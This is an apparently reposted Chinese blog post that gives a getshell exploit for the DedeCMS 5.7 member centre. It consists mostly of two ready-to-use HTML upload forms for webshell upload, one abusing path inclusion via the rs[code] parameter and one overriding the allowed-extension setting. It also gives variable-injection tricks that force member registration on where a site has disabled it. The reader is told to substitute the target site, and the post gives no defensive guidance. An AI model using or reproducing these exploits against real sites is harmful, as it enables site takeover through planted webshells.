您的位置 » 首页 » 实用工具 » dedecms(织梦)5.7会员中心最新getshell漏洞exp

dedecms(织梦)5.7会员中心最新getshell漏洞exp

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年06月03日 | 文章热度:14,997 次 全屏阅读

显示不全请点击全屏阅读

上传漏洞1:
漏洞原理:
/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post
这样就包含了dialog/select_soft_post
要求网站开启新会员注册功能,首先注册新会员,登陆会员中心,选择记住密码或者记住登录,不要关闭浏览器最好拉,因为下面的exp要保持在登录状态下。把马儿提前重命名为1.rar。

<form action=”http://www.3hack.com.com/plus/carbuyaction.php?dopost=memclickout&amp;oid=S-P0RN8888&amp;rs[code]=../dialog/select_soft_post” method=”post” name=”form1″ enctype=”multipart/form-data”>file:<input type=”file” name=”uploadfile” />
newname:<input type=”text” name=”newname” value=”myfile.Php” /><button type=”submit”>提交</button>

修改www.3hack.com 为你的目标站点,保存上面代码为1.html

选择上传1.rar即可。提交后尽管页面出错,myfile.Php文件会成功上传到网站根目录、

上传漏洞2:

</form><form action=”http://127.1/member/uploads_add.php” method=”post” name=”form1″ enctype=”multipart/form-data”><input type=”hidden” name=”mediatype” value=”4″ /> <input type=”hidden” name=”_GET[cfg_mb_addontype]” value=”P hp|Php|php” /> <input type=”hidden” name=”dopost” value=”save” /> <input id=”addonfile” type=”file” name=”addonfile” /><button type=”submit”>提交</button></form>保存为2.html。将待上传的Php文件扩展名改为“P hp” 有个空格,然后利用该页面完成上传,从地址栏得到新文件名。

如果网站禁止新会员注册怎么办?
有两个方法可以突破:
方法一:修改注册提交页面源码,将form的action值改为“http://127.1/member/reg_new.php?_POST[cfg_mb_allowreg]=Y”,其中“127.1”根据实际修改。 方法二:修改注册提交页面源码,在form中增加“input”元素,name属性为“COOKIE[cfgmballowreg]”,值为“Y”(非“N”)。
文章作者:随风.潜入夜
转自:网络大学|Network University:http://doie.net/?p=2900

Tags:

0day,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/131/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)